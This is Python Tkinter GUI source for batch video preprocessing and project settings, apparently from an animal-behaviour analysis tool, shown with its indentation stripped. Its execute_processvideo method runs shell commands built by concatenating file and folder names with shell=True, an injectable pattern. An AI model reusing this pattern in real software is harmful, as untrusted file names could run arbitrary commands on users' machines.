self.lblName3 = Label(self, text='Start Time',width = 13,font=("Helvetica",10,'bold'))
self.lblName3.grid(row=0, column=1,columnspan=2)
self.lblName4 = Label(self, text='End Time',width = 15,font=("Helvetica",10,'bold'))
self.lblName4.grid(row=0, column=3)
self.shorten = IntVar()
self.lblName5 = Checkbutton(self,text='Select All',variable= self.shorten,command=shortenbox)
self.lblName5.grid(row=0, column=4)
self.lblName6 = Label(self, text='Width',width =13,font=("Helvetica",10,'bold'))
self.lblName6.grid(row=0, column=5)
self.lblName7 = Label(self, text='Height',width = 15,font=("Helvetica",10,'bold'))
self.lblName7.grid(row=0, column=6)
self.downsample = IntVar()
self.lblName8 = Checkbutton(self,text='Select All',variable = self.downsample,command =downsambox)
self.lblName8.grid(row=0,column=7,padx=8)
self.grayscale = IntVar()
self.lblName9 = Checkbutton(self,text='Select All',variable =self.grayscale,command = graybox)
self.lblName9.grid(row=0,column=8,padx=7)
self.frameno = IntVar()
self.lblName10 = Checkbutton(self,text='Select All',variable = self.frameno,command = framebox)
self.lblName10.grid(row=0,column=9,padx=6)
self.clahe = IntVar()
self.lblName11 = Checkbutton(self,text='Select All',variable =self.clahe,command =clahebox)
self.lblName11.grid(row=0,column=10,padx=6)
class processvideotable(Frame):
def __init__(self,parent=None,fileDescription="",widths = "" ,dirname ="",outputdir='',color=None,**kw):
self.color = color if color is not None else 'black'
self.croplist = []
self.filename = os.path.join(dirname,fileDescription)
self.outputdir = outputdir
Frame.__init__(self,master=parent,**kw)
self.lblName = Label(self, text=fileDescription,fg=str(self.color),width= widths,anchor=W)
self.lblName.grid(row=0,column=0,sticky=W)
self.btnFind = Button(self, text="Crop",command=self.cropvid)
self.btnFind.grid(row=0,column=1)
self.trimstart = Entry(self)
self.trimstart.grid(row=0,column=2)
self.trimend = Entry(self)
self.trimend.grid(row=0, column=3)
self.shortenvar = IntVar()
self.downsamplevar = IntVar()
self.grayscalevar = IntVar()
self.superimposevar = IntVar()
self.clahevar = IntVar()
self.shortenvid = Checkbutton(self,text='Shorten',variable = self.shortenvar)
self.shortenvid.grid(row=0,column=4)
self.width = Entry(self)
self.width.grid(row=0,column=5)
self.height = Entry(self)
self.height.grid(row=0,column=6)
self.downsamplevid = Checkbutton(self,text='Downsample',variable = self.downsamplevar)
self.downsamplevid.grid(row=0,column=7)
self.grayscalevid = Checkbutton(self,text='Grayscale',variable= self.grayscalevar)
self.grayscalevid.grid(row=0,column =8)
self.superimposevid = Checkbutton(self,text='Add Frame #',variable =self.superimposevar)
self.superimposevid.grid(row=0,column=9)
self.clahevid = Checkbutton(self,text='CLAHE',variable = self.clahevar)
self.clahevid.grid(row=0,column =10)
def cropvid(self):
self.croplist = []
print(self.filename)
command = cropvid_queue(self.filename,self.outputdir)
self.croplist.append(command)
self.btnFind.configure(bg='red')
def get_crop_list(self):
return self.croplist
def getstarttime(self):
return self.trimstart.get()
def getendtime(self):
return self.trimend.get()
def shorten(self):
return self.shortenvar.get()
def downsample(self):
return self.downsamplevar.get()
def getwidth(self):
return self.width.get()
def getheight(self):
return self.height.get()
def grayscale(self):
return self.grayscalevar.get()
def addframe(self):
return self.superimposevar.get()
def get_clahe(self):
return self.clahevar.get()
class processvid_menu:
def __init__(self, videofolder, outputdir):
self.filesFound = []
self.row = []
self.videofolder = videofolder
self.outputdir = outputdir
########### FIND FILES ###########
for i in os.listdir(videofolder):
if i.endswith(('.avi','.mp4','.mov','flv','m4v')):
self.filesFound.append(i)
### longest string in list
maxname = max(self.filesFound,key=len)
# Popup window
vidprocessmenu = Toplevel()
vidprocessmenu.minsize(1100, 400)
vidprocessmenu.wm_title("Batch process video table")
vidprocessmenu.lift()
scroll = Canvas(hxtScrollbar(vidprocessmenu))
scroll.pack(fill="both",expand=True)
#shortcut for filling up parameters
shortcutframe = LabelFrame(scroll,text='Quick settings',pady=5,padx=5)
#shorten
shortenshortcut = LabelFrame(shortcutframe,text='Shorten settings',padx=5)
starttime = Entry_Box(shortenshortcut,'Start time','15')
endtime = Entry_Box(shortenshortcut,'End time','15')
shortenbutton = Button(shortenshortcut,text='Save settings',command=lambda:self.saveShortensettings(starttime.entry_get,endtime.entry_get))
#add sec
secondshortcut = LabelFrame(shortcutframe,text='Add seconds to start time',padx=5)
secondstoadd = Entry_Box(secondshortcut,'seconds','15')
addsecbutton = Button(secondshortcut,text='Add seconds',command=lambda:self.addsec(secondstoadd.entry_get))
#downsample
downsampleshortcut = LabelFrame(shortcutframe,text='Downsample settings',padx=5)
width = Entry_Box(downsampleshortcut,'Width','15')
height = Entry_Box(downsampleshortcut,'Height','15')
downsamplebutton = Button(downsampleshortcut,text='Save settings',command=lambda:self.saveDownsamplesettings(width.entry_get,height.entry_get))
#organize
shortenshortcut.grid(row=0,sticky=W,padx=10)
starttime.grid(row=0,sticky=W)
endtime.grid(row=1,sticky=W)
shortenbutton.grid(row=2,sticky=W)
secondshortcut.grid(row=1,sticky=W,padx=10)
secondstoadd.grid(row=0,sticky=W)
addsecbutton.grid(row=1,sticky=W)
downsampleshortcut.grid(row=0,column=1,sticky=W)
width.grid(row=0,sticky=W)
height.grid(row=1,sticky=W)
downsamplebutton.grid(row=2,sticky=W)
## starting of the real table
tableframe = LabelFrame(scroll)
# table title
self.title = processvid_title(tableframe, str(len(maxname)), shortenbox=self.selectall_shorten,
downsambox=self.selectall_downsample, graybox=self.selectall_grayscale,
framebox=self.selectall_addframe, clahebox=self.selectall_clahe)
#### loop for tables######
for i in range(len(self.filesFound)):
self.row.append(processvideotable(tableframe,str(self.filesFound[i]), str(len(maxname)),self.videofolder,self.outputdir))
self.row[i].grid(row=i+1, sticky=W)
#organize table title
self.title.grid(row=0, sticky=W)
#button to trigger process video
but = Button(scroll,text='Execute',command = lambda: threading.Thread(target=self.execute_processvideo).start(),font=('Times',12,'bold'),fg='navy')
but.grid(row=2)
#organize
shortcutframe.grid(row=0,sticky=W)
tableframe.grid(row=1,sticky=W,)
def addsec(self,secondToAdd):
outtimelist = []
# loop through and get final time
for i in range(len(self.filesFound)):
starttime = self.row[i].trimstart.get() #get the user's input
starttimelist = starttime.split(':') # split it into hours: minutes : seconds
for i in range(len(starttimelist)): # remove the 0 so it is compatible with the datetimeformat
if starttimelist[i][0] == '0':
starttimelist[i] = starttimelist[i][1:]
hr,min,sec = starttimelist #get inputs for datetime
starttime = datetime.time(int(hr),int(min),int(sec))
out_time = str(self.addSecs(starttime,int(secondToAdd))) #call addSecs func: starttime + secondToAdd = out_time
outtimelist.append(out_time)
# add the final time into the table
for i in range(len(self.filesFound)):
self.row[i].trimend.delete(0, END)
self.row[i].trimend.insert(0,outtimelist[i])
def addSecs(self,tm, secs):
fulldate = datetime.datetime(100, 1, 1, tm.hour, tm.minute, tm.second)
fulldate = fulldate + datetime.timedelta(seconds=secs)
return fulldate.time()
def saveDownsamplesettings(self,width,height):
for i in range(len(self.filesFound)):
self.row[i].width.delete(0, END)
self.row[i].height.delete(0, END)
self.row[i].width.insert(0,width)
self.row[i].height.insert(0,height)
def saveShortensettings(self,startime,endtime):
for i in range(len(self.filesFound)):
self.row[i].trimstart.delete(0, END)
self.row[i].trimend.delete(0, END)
self.row[i].trimstart.insert(0,startime)
self.row[i].trimend.insert(0,endtime)
def selectall_clahe(self):
for i in range(len(self.filesFound)):
if self.title.clahe.get() == 1:
self.row[i].clahevid.select()
else:
self.row[i].clahevid.deselect()
def selectall_addframe(self):
for i in range(len(self.filesFound)):
if self.title.frameno.get() == 1:
self.row[i].superimposevid.select()
else:
self.row[i].superimposevid.deselect()
def selectall_grayscale(self):
for i in range(len(self.filesFound)):
if self.title.grayscale.get()==1:
self.row[i].grayscalevid.select()
else:
self.row[i].grayscalevid.deselect()
def selectall_downsample(self):
for i in range(len(self.filesFound)):
if self.title.downsample.get()==1:
self.row[i].downsamplevid.select()
else:
self.row[i].downsamplevid.deselect()
def selectall_shorten(self):
for i in range(len(self.filesFound)):
if self.title.shorten.get()==1:
self.row[i].shortenvid.select()
else:
self.row[i].shortenvid.deselect()
def get_thecroplist(self):
self.croplistt = []
for i in range(len(self.filesFound)):
self.croplistt.append((self.row[i].get_crop_list()))
print(self.croplistt)
self.croplistt = list(itertools.chain(*self.croplistt))
return self.croplistt
def get_shortenlist(self):
self.shortenlistt = []
for i in range(len(self.filesFound)):
if (self.row[i].shorten()) == 1:
self.shortenlistt.append(shortenvideos1_queue(self.outputdir,self.filesFound[i],self.row[i].getstarttime(),self.row[i].getendtime()))
return self.shortenlistt
def get_downsamplelist(self):
self.downsamplelistt = []
for i in range(len(self.filesFound)):
if (self.row[i].downsample()) == 1:
self.downsamplelistt.append(downsamplevideo_queue(self.row[i].getwidth(),self.row[i].getheight(),self.filesFound[i],self.outputdir))
return self.downsamplelistt
def get_grayscalelist(self):
self.grayscalelistt = []
for i in range(len(self.filesFound)):
if (self.row[i].grayscale()) == 1:
self.grayscalelistt.append(greyscale_queue(self.outputdir,self.filesFound[i]))
return self.grayscalelistt
def get_superimposeframelist(self):
self.superimposeframelistt = []
for i in range(len(self.filesFound)):
if (self.row[i].addframe()) == 1:
self.superimposeframelistt.append(superimposeframe_queue(self.outputdir, self.filesFound[i]))
return self.superimposeframelistt
def execute_processvideo(self):
# create a temp folder in the output dir
tmp_folder = os.path.join(self.outputdir,'tmp')
if os.path.exists(tmp_folder):
shutil.rmtree(tmp_folder)
os.mkdir(tmp_folder) #make temp folder
# remove process txt file if process were killed half way
try:
os.remove(os.path.join(self.outputdir,'process_video_define.txt'))
except:
print('Executing...')
# compiling the list of commands
try:
crop = self.get_thecroplist()
crop = [i for i in crop if i] ### remove any none in crop
except:
crop = []
try:
shorten = self.get_shortenlist()
except:
shorten = []
try:
downsample = self.get_downsamplelist()
except:
downsample = []
try:
grayscale = self.get_grayscalelist()
except:
grayscale = []
try:
superimpose = self.get_superimposeframelist()
except:
superimpose = []
## copy video and move it to output dir
copyvideos = []
for i in self.filesFound:
if currentPlatform == 'Windows':
command = 'copy \"' + str(self.videofolder) + '\\' + str(os.path.basename(i)) + '\" \"' + self.outputdir + '\"'
if currentPlatform == 'Linux'or (currentPlatform == 'Darwin'):
command = 'cp "' + str(self.videofolder) + '/' + str(os.path.basename(i)) + '" "' + self.outputdir + '/"'
copyvideos.append(command)
#compiling all the commands into list
all_list = copyvideos + crop + shorten + downsample + grayscale + superimpose
print(len(all_list))
#creating text file
filepath = os.path.join(self.outputdir, 'process_video_define.txt')
if os.path.exists(filepath):
append_write = 'a' # append if already exists
else:
append_write = 'w' # make a new file if not
## writing into the txt file
highscore = open(filepath, append_write)
for i in all_list:
highscore.write(i + '\n')
highscore.close()
## running it using subprocess
with open(filepath) as fp:
for cnt, line in enumerate(fp):
# add probably if ffmpeg then this if not then other subprocess
subprocess.call(line, shell=True, stdout=subprocess.PIPE)
##clahe
for i in range(len(self.filesFound)):
if self.row[i].get_clahe() == 1:
clahe_queue(os.path.join(self.outputdir, os.path.basename(self.filesFound[i])))
else:
print('Clahe not applied to',str(self.filesFound[i]))
##rename the txt file ran
file = os.path.join(os.path.dirname(filepath), 'Processes_ran.txt')
os.rename(filepath, file)
dir = os.path.join(self.outputdir, 'process_archive')
try:
os.makedirs(dir)
print("Directory", dir, "created ")
except FileExistsError:
print("Directory", dir, "already exists")
currentDT = datetime.datetime.now()
currentDT = str(currentDT.month) + '_' + str(currentDT.day) + '_' + str(currentDT.year) + '_' + str(currentDT.hour) + 'hour' + '_' + str(currentDT.minute) + 'min' + '_' + str(currentDT.second) + 'sec'
try:
shutil.move(file, dir)
except shutil.Error:
os.rename(file, file[:-4] + str(currentDT) + '.txt')
shutil.move(file[:-4] + str(currentDT) + '.txt', dir)
print('Process video completed.')
class batch_processvideo: ##pre process video first menu (ask for input and output folder)
def __init__(self):
# Popup window
batchprocess = Toplevel()
batchprocess.minsize(400, 200)
batchprocess.wm_title("Batch process video")
#Video Selection Tab
label_videoselection = LabelFrame(batchprocess,text='Folder selection',font='bold',padx=5,pady=5)
self.folder1Select = FolderSelect(label_videoselection,'Video directory:',title='Select Folder with videos')
#output video
self.outputfolder = FolderSelect(label_videoselection,'Output directory:',title='Select a folder for your output videos')
#create list of all videos in the videos folder
button_cL = Button(label_videoselection,text='Confirm',command=self.confirmtable)
#organize
label_videoselection.grid(row=0,sticky=W)
self.folder1Select.grid(row=0,sticky=W)
self.outputfolder.grid(row=1,sticky=W)
button_cL.grid(row=2,sticky=W)
def confirmtable(self):
if (self.outputfolder.folder_path!='No folder selected')and(self.folder1Select.folder_path!='No folder selected'):
processvid_menu(self.folder1Select.folder_path, self.outputfolder.folder_path)
elif (self.outputfolder.folder_path=='No folder selected'):
print('Please select an output folder')
elif (self.folder1Select.folder_path == 'No folder selected'):
print('Please select a folder with videos')
else:
print('Please select folder with videos and the output directory')
class outlier_settings:
def __init__(self,configini):
self.configini = configini
#get the no of animals
config = ConfigParser()
configFile = str(configini)
config.read(configFile)
animalno = config.getint('General settings','animal_no')
# get list from csv
animalBpNames = define_bp_drop_down(configini)
# Popup window
outlier_set = Toplevel()
outlier_set.minsize(400, 400)
outlier_set.wm_title("Outlier Settings")
scroll = LabelFrame(hxtScrollbar(outlier_set))
scroll.grid()
IDList = config.get('Multi animal IDs', 'id_list')
if not IDList:
IDList = []
for i in range(animalno):
IDList.append('Animal ' + str(i+1))
else:
IDList = config.get('Multi animal IDs', 'id_list')
IDList = IDList.split(",")
# location correction menu bar
self.label_location_correction = LabelFrame(scroll, text='Location correction',font=('Times',12,'bold'),pady=5,padx=5)
self.choosebp1List, self.choosebp2List, self.var1List, self.var2List, self.dropDownBp1List, self.dropDownBp2List = [], [], [], [], [], []
for animal in range(len(IDList)):
animalIDname = IDList[animal]
currTextBp1 = 'Choose ' + str(animalIDname) + ' body part 1:'
currTextBp2 = 'Choose ' + str(animalIDname) + ' body part 2:'
self.choosebp1List.append(Label(self.label_location_correction, text=currTextBp1))
self.choosebp2List.append(Label(self.label_location_correction, text=currTextBp2))
self.var1List.append(StringVar())
self.var2List.append(StringVar())
self.var1List[animal].set(animalBpNames[animal][0])
self.var2List[animal].set(animalBpNames[animal][1])
self.dropDownBp1List.append(OptionMenu(self.label_location_correction, self.var1List[animal], *animalBpNames[animal]))
self.dropDownBp2List.append(OptionMenu(self.label_location_correction, self.var2List[animal], *animalBpNames[animal]))
self.location_criterion = Entry_Box(self.label_location_correction, 'Location criterion', '15')
# movement
self.label_movement_correction = LabelFrame(scroll, text='Movement correction', font=('Times', 12, 'bold'),pady=5, padx=5)
self.choosebp1ListMov, self.choosebp2ListMov, self.var1ListMov, self.var2ListMov, self.dropDownBp1ListMov, self.dropDownBp2ListMov = [], [], [], [], [], []
for animal in range(len(IDList)):
animalIDname = IDList[animal]
currTextBp1 = 'Choose ' + str(animalIDname) + ' body part 1:'
currTextBp2 = 'Choose ' + str(animalIDname) + ' body part 2:'
self.choosebp1ListMov.append(Label(self.label_movement_correction, text=currTextBp1))
self.choosebp2ListMov.append(Label(self.label_movement_correction, text=currTextBp2))
self.var1ListMov.append(StringVar())
self.var2ListMov.append(StringVar())
self.var1ListMov[animal].set(animalBpNames[animal][0])
self.var2ListMov[animal].set(animalBpNames[animal][1])
self.dropDownBp1ListMov.append(OptionMenu(self.label_movement_correction, self.var1ListMov[animal], *animalBpNames[animal]))
self.dropDownBp2ListMov.append(OptionMenu(self.label_movement_correction, self.var2ListMov[animal], *animalBpNames[animal]))
self.movement_criterion = Entry_Box(self.label_movement_correction, 'Movement criterion', '15')
# mean or median
medianlist = ['mean', 'median']
self.medianvar = StringVar()
self.medianvar.set(medianlist[0])
label_median = LabelFrame(scroll, text='Median or Mean', font=('Times', 12, 'bold'), pady=5, padx=5)
mediandropdown = OptionMenu(label_median, self.medianvar, *medianlist)
button_setvalues = Button(scroll, text='Confirm', command=self.set_outliersettings, font=('Arial', 12, 'bold'),fg='red')
self.label_location_correction.grid(row=0, sticky=W)
self.location_criterion.grid(row=100, column=0, sticky=W)
for row, dropdown in zip(range(0, len(IDList)+4, 2), range(len(IDList)+1)):
try:
self.choosebp1List[dropdown].grid(row=row, column=0, sticky=W)
self.dropDownBp1List[dropdown].grid(row=row, column=1, sticky=W)
self.choosebp2List[dropdown].grid(row=row+1, column=0, sticky=W)
self.dropDownBp2List[dropdown].grid(row=row+1, column=1, sticky=W)
except IndexError:
pass
self.label_movement_correction.grid(row=1, sticky=W)
self.movement_criterion.grid(row=100, sticky=W)
for row, dropdown in zip(range(0, len(IDList) + 2, 2), range(len(IDList) + 1)):
try:
self.choosebp1ListMov[dropdown].grid(row=row, column=0, sticky=W)
self.dropDownBp1ListMov[dropdown].grid(row=row, column=1, sticky=W)
self.choosebp2ListMov[dropdown].grid(row=row + 1, column=0, sticky=W)
self.dropDownBp2ListMov[dropdown].grid(row=row + 1, column=1, sticky=W)
except IndexError:
pass
label_median.grid(row=2,column=0,sticky=W)
mediandropdown.grid(row=2,sticky=W)
button_setvalues.grid(row=3,pady=10)
def set_outliersettings(self):
# export settings to config ini file
configini = self.configini
config = ConfigParser()
config.read(configini)
animalno = config.getint('General settings', 'animal_no')
animalNameList = []
try:
multiAnimalIDList = config.get('Multi animal IDs', 'id_list')
multiAnimalIDList = multiAnimalIDList.split(",")
except NoSectionError:
multiAnimalIDList = ['']
if multiAnimalIDList[0] == '':
for animal in range(animalno):
animalNameList.append('Animal_' + str(animal+1))
else:
animalNameList = multiAnimalIDList
try:
for animal in range(len(animalNameList)):
locBp1 = self.var1List[animal].get()
locBp2 = self.var2List[animal].get()
movBp1 = self.var1ListMov[animal].get()
movBp2 = self.var2ListMov[animal].get()
config.set('Outlier settings', 'movement_bodyPart1_' + str(animalNameList[animal]), str(movBp1))
config.set('Outlier settings', 'movement_bodyPart2_' + str(animalNameList[animal]), str(movBp2))
config.set('Outlier settings', 'location_bodyPart1_' + str(animalNameList[animal]), str(locBp1))
config.set('Outlier settings', 'location_bodyPart2_' + str(animalNameList[animal]), str(locBp2))
movementcriterion = self.movement_criterion.entry_get
locationcriterion = self.location_criterion.entry_get
mean_or_median = self.medianvar.get()
config.set('Outlier settings', 'movement_criterion', str(movementcriterion))
config.set('Outlier settings', 'location_criterion', str(locationcriterion))
config.set('Outlier settings', 'mean_or_median', str(mean_or_median))
with open(configini, 'w') as configfile:
config.write(configfile)
print('Outlier correction settings updated in project_config.ini')
except:
print('Please make sure all fields are filled in correctly.')
class FolderSelect(Frame):
def __init__(self,parent=None,folderDescription="",color=None,title=None,lblwidth =None,**kw):
self.title=title
self.color = color if color is not None else 'black'
self.lblwidth = lblwidth if lblwidth is not None else 0
self.parent = parent
Frame.__init__(self,master=parent,**kw)
self.folderPath = StringVar()
self.lblName = Label(self, text=folderDescription,fg=str(self.color),width=str(self.lblwidth),anchor=W)
self.lblName.grid(row=0,column=0,sticky=W)
self.entPath = Label(self, textvariable=self.folderPath,relief=SUNKEN)
self.entPath.grid(row=0,column=1)
self.btnFind = Button(self, text="Browse Folder",command=self.setFolderPath)
self.btnFind.grid(row=0,column=2)
self.folderPath.set('No folder selected')
def setFolderPath(self):
folder_selected = askdirectory(title=str(self.title),parent=self.parent)
if folder_selected:
self.folderPath.set(folder_selected)
else:
self.folderPath.set('No folder selected')
@property
def folder_path(self):
return self.folderPath.get()
class DropDownMenu(Frame):
def __init__(self,parent=None,dropdownLabel='',choice_dict=None,labelwidth='',com=None,**kw):
Frame.__init__(self,master=parent,**kw)
self.dropdownvar = StringVar()
self.lblName = Label(self,text=dropdownLabel,width=labelwidth,anchor=W)
self.lblName.grid(row=0,column=0)
self.choices = choice_dict
self.popupMenu = OptionMenu(self,self.dropdownvar,*self.choices,command=com)
self.popupMenu.grid(row=0,column=1)
def getChoices(self):
return self.dropdownvar.get()
def setChoices(self,choice):
self.dropdownvar.set(choice)
class FileSelect(Frame):
def __init__(self,parent=None,fileDescription="",color=None,title=None,lblwidth=None,**kw):
self.title=title
self.color = color if color is not None else 'black'
self.lblwidth = lblwidth if lblwidth is not None else 0
self.parent=parent
Frame.__init__(self,master=parent,**kw)
self.filePath = StringVar()
self.lblName = Label(self, text=fileDescription,fg=str(self.color),width=str(self.lblwidth),anchor=W)
self.lblName.grid(row=0,column=0,sticky=W)
self.entPath = Label(self, textvariable=self.filePath,relief=SUNKEN)
self.entPath.grid(row=0,column=1)
self.btnFind = Button(self, text="Browse File",command=self.setFilePath)
self.btnFind.grid(row=0,column=2)
self.filePath.set('No file selected')
def setFilePath(self):
file_selected = askopenfilename(title=self.title,parent=self.parent)
if file_selected:
self.filePath.set(file_selected)
else:
self.filePath.set('No file selected')
@property
def file_path(self):
return self.filePath.get()
class Entry_Box(Frame):
def __init__(self, parent=None, fileDescription="", labelwidth='',status=None, validation=None, **kw):
super(Entry_Box, self).__init__(master=parent)
self.validation_methods = {
'numeric': (self.register(form_validator_is_numeric), '%P', '%d'),
}
self.status = status if status is not None else NORMAL
self.labelname = fileDescription
Frame.__init__(self,master=parent,**kw)
self.filePath = StringVar()
self.lblName = Label(self, text=fileDescription,width=labelwidth,anchor=W)
self.lblName.grid(row=0,column=0)
self.entPath = Entry(self, textvariable=self.filePath, state=self.status,
validate='key',
validatecommand=self.validation_methods.get(validation, None))
self.entPath.grid(row=0,column=1)
@property
def entry_get(self):
self.entPath.get()
return self.entPath.get()
def entry_set(self, val):
self.filePath.set(val)
def set_state(self,setstatus):
self.entPath.config(state=setstatus)
def destroy(self):
self.lblName.destroy()
self.entPath.destroy()
class newcolumn(Frame):
def __init__(self,parent=None,lengthoflist=[],width='',**kw):
Frame.__init__(self,master=parent,**kw)
self.entPath = []
self.entPathvars =[]
for i in range(len(lengthoflist)):
self.entPathvar = IntVar()
self.entPathvars.append(self.entPathvar)
self.entPath.append(Entry(self, textvariable=self.entPathvars[i],width=width))
self.entPath[i].grid(row=i,pady=3)
def entry_get(self,row):
return self.entPath[row].get()
def setvariable(self,row,vars):
return self.entPathvars[row].set(vars)
class Button_getcoord(Frame):
def __init__(self,parent=None,filename=[],knownmm=[],ppmlist = None,**kw): #set to list and use range i in list to call each elements in list
Frame.__init__(self, master=parent, **kw)
self.entPath = []
self.ppm_list = []
self.ppmvar = []
self.filename = filename
labelgetcoord =Label(self,text='Get coord')
labelgetcoord.grid(row=0,pady=6)
labelppm =Label(self,text='Pixels/mm')
labelppm.grid(row=0,column=1)
for i in range(len(filename)-1):
self.entPath.append(Button(self,text='Video'+str(i+1),command =lambda i=i :self.getcoord_forbutton(filename[i+1],knownmm[i+1],i)))
self.entPath[i].grid(row=i+1)
self.ppmvars=IntVar()
self.ppmvar.append(self.ppmvars)
self.ppm_list.append(Entry(self,textvariable=self.ppmvar[i]))
self.ppm_list[i].grid(row=i+1,column=1)
if ppmlist != None:
try:
for i in range(len(self.ppmvar)):
self.ppmvar[i].set(ppmlist[i])
except IndexError:
pass
print(ppmlist)
def getcoord_forbutton(self,filename,knownmm,count):
ppm = get_coordinates_nilsson(filename,knownmm)
if ppm == float('inf'):
print('Divide by zero error. Please make sure the values in [Distance_in_mm] are updated')
else:
self.ppmvar[count].set(ppm)
def getppm(self,count):
ppms = self.ppm_list[count].get()
return ppms
def set_allppm(self,value):
for i in range(len(self.filename) - 1):
self.ppmvar[i].set(value)
def Exit():
app.root.destroy()
def onMousewheel(event, canvas):
try:
scrollSpeed = event.delta
if platform.system() == 'Darwin':
scrollSpeed = event.delta
elif platform.system() == 'Windows':
scrollSpeed = int(event.delta / 120)
canvas.yview_scroll(-1 * (scrollSpeed), "units")
except:
pass
def bindToMousewheel(event, canvas):
canvas.bind_all("<MouseWheel>", lambda event: onMousewheel(event, canvas))
def unbindToMousewheel(event, canvas):
canvas.unbind_all("<MouseWheel>")
def onFrameConfigure(canvas):
'''Reset the scroll region to encompass the inner frame'''
canvas.configure(scrollregion=canvas.bbox("all"))
def hxtScrollbar(master):
'''
Create canvas.
Create a frame and put it in the canvas.
Create two scrollbar and insert command of canvas x and y view
Use canvas to create a window, where window = frame
Bind the frame to the canvas
'''
bg = master.cget("background")
acanvas = Canvas(master, borderwidth=0, background=bg)
frame = Frame(acanvas, background=bg)
vsb = Scrollbar(master, orient="vertical", command=acanvas.yview)
vsb2 = Scrollbar(master, orient='horizontal', command=acanvas.xview)
acanvas.configure(yscrollcommand=vsb.set)
acanvas.configure(xscrollcommand=vsb2.set)
vsb.pack(side="right", fill="y")
vsb2.pack(side="bottom", fill="x")
acanvas.pack(side="left", fill="both", expand=True)
acanvas.create_window((10, 10), window=frame, anchor="nw")
# bind the frame to the canvas
acanvas.bind("<Configure>", lambda event, canvas=acanvas: onFrameConfigure(acanvas))
acanvas.bind('<Enter>', lambda event: bindToMousewheel(event, acanvas))
acanvas.bind('<Leave>', lambda event: unbindToMousewheel(event,acanvas))
return frame
class video_info_table:
def __init__(self,configini):
self.filesFound = [0] #initiate files found
config = ConfigParser()
self.configFile = str(configini)
config.read(self.configFile)
projectPath = config.get('General settings', 'project_path')
video_info_csv = os.path.join(projectPath, 'logs', 'video_info.csv')
self.config_videofolders = os.path.join(projectPath, 'videos')
config_distancemm = config.get('Frame settings', 'distance_mm')
########### FIND FILES ###########
for i in os.listdir(self.config_videofolders):
if i.endswith(('.avi','.mp4','.mov','flv','m4v')):
self.filesFound.append(i)
# if csv exist, find the difference and append
if os.path.exists(video_info_csv):
df = pd.read_csv(video_info_csv)
videodf = df['Video'].to_list()
videodf = [s +'.mp4' for s in videodf]
videodf = list(set(videodf) - set(self.filesFound))
self.filesFound += videodf
##GUI
self.tkintertable = Toplevel()
self.tkintertable.minsize(1000, 500)
self.tkintertable.wm_title("Video Info")
self.xscrollbar = Canvas(hxtScrollbar(self.tkintertable))
self.xscrollbar.pack(expand=True,fill=BOTH)
self.myframe = LabelFrame(self.xscrollbar,text='Table')
self.myframe.grid(row=6)
self.new_col_list = ['index','Video','fps','Resolution_width','Resolution_height','Distance_in_mm']
self.table_col=[]
self.col_width= ['6','35','20','20','20','20']
#### loop for tables######
for i in range(len(self.new_col_list)):
self.table_col.append(newcolumn(self.myframe,self.filesFound,self.col_width[i]))
self.table_col[i].grid(row=0,column=i, sticky=W)
###set values for base####
count = 0
for i in self.filesFound:
currvid= os.path.join(str(self.config_videofolders),str(i))
if os.path.exists(currvid) or i==0:
vid= cv2.VideoCapture(currvid)
self.table_col[0].setvariable(count,str(count)+'.')
self.table_col[1].setvariable(count,i)
self.table_col[2].setvariable(count, int(vid.get(cv2.CAP_PROP_FPS)))
self.table_col[3].setvariable(count, int(vid.get(cv2.CAP_PROP_FRAME_WIDTH)))
self.table_col[4].setvariable(count, int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT)))
self.table_col[5].setvariable(count,config_distancemm)
else:
self.table_col[0].setvariable(count, str(count) + '.')
self.table_col[1].setvariable(count, i)
self.table_col[2].setvariable(count, int(df.loc[df['Video']==i.split('.')[0]].values.tolist()[0][1]))
self.table_col[3].setvariable(count, int(df.loc[df['Video']==i.split('.')[0]].values.tolist()[0][2]))
self.table_col[4].setvariable(count, int(df.loc[df['Video']==i.split('.')[0]].values.tolist()[0][3]))
self.table_col[5].setvariable(count, config_distancemm)
count+=1
#set title
count=0
for i in self.new_col_list:
self.table_col[count].setvariable(0,i)
count+=1
###set up get coord button on table####
self.data_lists = []
for i in range(len(self.table_col)):
self.data_lists.append([])
for i in self.filesFound:
self.data_lists[1].append(os.path.join(self.config_videofolders, str(i)))
self.data_lists[5].append(int(0))
if os.path.exists(video_info_csv):
df = pd.read_csv(video_info_csv)
videoincsv = df['Video'].tolist()
pixelsincsv = df['pixels/mm'].tolist()
df_dict = dict(zip(videoincsv,pixelsincsv))
videoslist = self.filesFound.copy()
videoslist = videoslist[1:]
for i in range(len(videoslist)):
videoslist[i] = str(videoslist[i]).split('.')[0]
videosdict = dict(zip(videoslist,range(len(videoslist))))
for keys in videosdict.keys():
if keys in df_dict:
videosdict[keys] = df_dict[keys]
else:
videosdict[keys] = 0
pixellist = list(videosdict.values())
self.pixel_list = pixellist
self.getdata()
self.button = Button_getcoord(self.xscrollbar, self.data_lists[1], self.data_lists[5],pixellist)
self.button.grid(row=6, column=1)
else:
self.pixel_list= None
self.getdata()
self.button = Button_getcoord(self.xscrollbar,self.data_lists[1],self.data_lists[5])
self.button.grid(row=6,column=1)
#instructions
label_getdatadesc1 = Label(self.xscrollbar,text='1. Enter the known distance (mm) in the "Distance_in_mm" column. Consider using the "autopopulate" entry box if you have a lot of videos.')
label_getdatadesc2 = Label(self.xscrollbar,text='2. Click on <Update distance_in_mm> button before clicking on the "Get coord" button(s) to calculate pixels/mm.')
label_getdatadesc3 = Label(self.xscrollbar,text='3. Click <Save Data> when all the data are filled in. Use the <Add Columns> button to add infmation on each video, e.g., animal ID or experimental group.')
label_getdatadesc1.grid(row=0,sticky=W)
label_getdatadesc2.grid(row=1, sticky=W)
label_getdatadesc3.grid(row=2, sticky=W)
get_data_button = Button(self.xscrollbar, text='Update distance_in_mm', command=self.getdata)
get_data_button.grid(row=3,sticky=W)
add_column_button = Button(self.xscrollbar,text='<Add Column>',command=self.addBox,fg='red')
add_column_button.grid(row=4,sticky=W)
generate_csv_button = Button(self.xscrollbar,text='Save Data',command=self.generate_video_info_csv,font='bold',fg='red')
generate_csv_button.grid(row=5)
setppmbutton = Button(self.xscrollbar,text='Duplicate index 1 pixel/mm (CAUTION!)',command= self.setAll_ppm, fg='red')
setppmbutton.grid(row =5,column=1)
def addBox(self):
self.new_col_list.append(0)
self.next_column = len(self.new_col_list)
#print(self.next_column)
self.table_col.append(newcolumn(self.myframe,self.filesFound,'20'))
self.table_col[(self.next_column)-1].grid(row=0,column=self.next_column)
def getdata(self):
self.data_lists =[]
#get all data from tables
for i in range(len(self.table_col)):
self.data_lists.append([])
for j in range(len(self.filesFound)):
